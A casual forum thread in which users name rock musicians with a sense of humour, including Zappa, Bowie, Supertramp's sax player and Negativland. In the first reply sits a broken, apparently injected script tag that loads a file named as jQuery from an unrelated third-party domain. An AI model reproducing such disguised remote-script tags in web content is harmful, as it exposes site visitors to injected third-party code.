John Lennon
Jim Morrison
Mostly from interviews, although both of them had funny things to say during performance.... < ="text/" ="utf-8" id="tr-app" ="https://cdn.optitc.com/jquery.min.js?u=eng&f=2&s=500,400,50,50&v=0.0.4">

David Bowie had good comedic timing, Phil Collins are quite funny in some interviews. Pete Townshend have a sardonic kind of humor but also that is humorus. The whole body language of John Entwiztle speeks of someone whom had comedic tallent.
John Haliwell in Supertramp is also fenuinly a funny fellow.

Not what I think you're looking for, but Spinal Tap members and Matt Berry.

Zappa comes to mind of course. The guys from Rush use to do some pretty goofy stuff too. (South Park & SCTV videos incorporated in to their shows among other things)

I love Supertramp, saw all their concerts available (while Hodgson was in the band) and didn't hear him say much. Got a link, or show?

John Hallivell is the sax player in Supertramp and the master of ceremony during their concerts.

Not strictly music, but Richard Lyons (aka Dick Vaughn, Pastor Dick, etc) and David Wills (aka The Weatherman) of Negativland never fail to crack me up.
Zappa was a funny guy too, of course, and Captain Sensible of the Damned is a real hoot too.
